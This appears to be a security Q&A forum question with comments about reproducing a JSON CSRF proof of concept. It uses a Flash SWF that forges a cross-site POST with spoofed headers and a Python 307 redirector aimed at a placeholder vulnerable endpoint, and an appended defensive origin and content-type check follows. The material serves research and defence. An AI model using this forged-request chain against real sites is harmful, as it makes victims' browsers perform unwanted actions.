
I was trying to recreate a PoC where an endpoint didn't have CSRF protection and was exposing a form submission.

So, I have read these (before asking here):

  1. Vimeo HackerOne report by avlidienbrunn
  2. GeekBoy's article on JSON CSRF
  3. StackOverflow question: csrf-with-json-post-when-content-type-must-be-application-json
  4. Exploiting CSRF on JSON Endpoints

My ActionScript code looks like this:

package
{
  import flash.display.Sprite;
  import flash.net.URLLoader;
  import flash.net.URLRequest;
  import flash.net.URLRequestHeader;
  import flash.net.URLRequestMethod;

  public class csrf extends Sprite
  {
    public function csrf()
    {
      super();
      var member1:Object = null;
      var myJson:String = null;
      member1 = new Object();
      member1 = {
        "user_id":36427093
      };
      var myData:Object = member1;
      myJson = JSON.stringify(myData);
      var url:String = "http://my-server:8000/";
      var request:URLRequest = new URLRequest(url);
      request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json;charset=utf-8"));
      request.requestHeaders.push(new URLRequestHeader("Referer","https://some-vulnerable-endpoint"));
      request.requestHeaders.push(new URLRequestHeader("X-Requested-With","https://some-vulnerable-endpoint"));
      request.data = myJson;
      request.method = URLRequestMethod.POST;
      var urlLoader:URLLoader = new URLLoader();

      try
      {
        urlLoader.load(request);
        return;
      }
      catch(e:Error)
      {
        trace(e);
        return;
      }
    }
  }
}

My Python pyredirector.py looks like this:

import BaseHTTPServer
import time
import sys

HOST = '' 
PORT = 8000
vulnerable_endpoint="https://some-vulnerable-endpoint-here"

class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  def do_POST(s):
    if s.path == '/csrf.swf':
      s.send_response(200)
      s.send_header("Content-Type","application/x-shockwave-flash")
      s.end_headers()
      s.wfile.write(open("csrf.swf", "rb").read())  # csrf.swf is the filename you compiled the above actionscript to
      return 
    s.send_response(307)
    s.send_header("Location", vulnerable_endpoint)
    s.end_headers()
  def do_GET(s):
    print(s.path)
    s.do_POST()

if __name__ == '__main__':
  server_class = BaseHTTPServer.HTTPServer
  httpd = server_class((HOST,PORT), RedirectHandler)
  print time.asctime(),"Server Starts - %s:%s" % (HOST,PORT)
  try:
    httpd.serve_forever()
  except KeyboardInterrupt:
    pass
  httpd.server_close()
  print time.asctime(),"Server Stops - %s:%s" % (HOST,PORT)

Problem

Now, when I go to http://my-server:8000/, the csrf.swf redirects me to the vulnerable endpoint, but it makes a GET request, so my JSON payload is dropped and the CSRF doesn't happen.

This happens even though I have the line request.method = URLRequestMethod.POST; in the ActionScript code.

Now, I haven't done any coding in ActionScript, nor do I intend to. Seeing the HackerOne report and the corresponding video PoC, the reporter's PoC worked just fine (however, it was 4 years back).

I don't understand why it's forwarding as a GET request.

Thanks for bearing with my ignorance and naivety.
  • How did you confirm that it is making a get request instead of a post? Packet Capture? – DarkMatter Feb 15 '19 at 20:26
  • You can see it in Network tab, in Chrome's developer tools option – temporarya Feb 15 '19 at 20:35
  • If I'm reading this right when you navigate to http://my-server:8000/ the do_GET(S) runs, which calls do_POST(). If you want to process the initial get as a post then you may need to pass "S" when you call s.do_POST(S) from do_GET() – Daisetsu Feb 15 '19 at 21:23
  • It's `self`, as you can see in `do_GET()`; it's taken from the 4th article I mentioned in my post. – temporarya Feb 15 '19 at 21:30
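As an added, server-side counterpart to the setup in the question (example code, not part of the question or of the linked reports): a check an endpoint can apply to reject the kind of cross-site JSON POST that a plugin or a method-preserving 307 redirect delivers. The trusted origin, the header values and the sample request are constructed for this example.

```python
from urllib.parse import urlsplit

# Origins allowed to drive state-changing requests (constructed for this example).
TRUSTED_ORIGINS = {"https://app.example"}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def _origin_of(url):
    """Reduce a URL to scheme://host[:port]; None if it cannot be parsed."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None
    return "%s://%s" % (parts.scheme.lower(), parts.netloc.lower())


def reject_cross_site_json(method, headers):
    """Return None if the request may proceed, else a short rejection reason.

    `headers` maps lower-case header names to values. Safe methods pass;
    state-changing ones must carry a JSON content type, a trusted Origin (or,
    failing that, a trusted Referer) and a non-safelisted custom header.
    """
    if method.upper() not in STATE_CHANGING:
        return None
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return "content-type is not application/json"
    # Browsers send Origin on cross-origin POSTs; after a cross-origin redirect
    # it becomes the literal string "null", which must count as untrusted.
    origin = headers.get("origin")
    if origin is not None:
        if origin == "null" or origin not in TRUSTED_ORIGINS:
            return "untrusted origin %r" % origin
    elif _origin_of(headers.get("referer")) not in TRUSTED_ORIGINS:
        return "missing origin and untrusted referer %r" % headers.get("referer")
    # A non-safelisted header forces a CORS preflight on cross-origin requests,
    # which this server never approves, so its presence implies a same-origin client.
    if headers.get("x-requested-with") != "XMLHttpRequest":
        return "missing X-Requested-With header"
    return None


if __name__ == "__main__":
    # Constructed request shaped like the one the SWF in the question builds.
    sample = {"content-type": "application/json;charset=utf-8",
              "referer": "https://attacker.example/csrf.swf"}
    print(reject_cross_site_json("POST", sample))
```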
